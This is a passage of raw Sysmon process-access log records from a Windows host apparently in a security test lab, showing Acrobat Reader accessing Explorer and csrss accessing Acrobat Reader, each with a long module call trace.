DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a149|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.346{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a149|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.346{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a149|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.344{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a041|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.344{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a041|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.344{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a041|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.344{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3a041|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.343{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39f39|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.343{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39f39|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.343{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39f39|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.343{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39f39|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.341{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39e31|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.341{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39e31|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.341{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39e31|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.341{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39e31|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.340{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39d29|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.340{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.340{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader 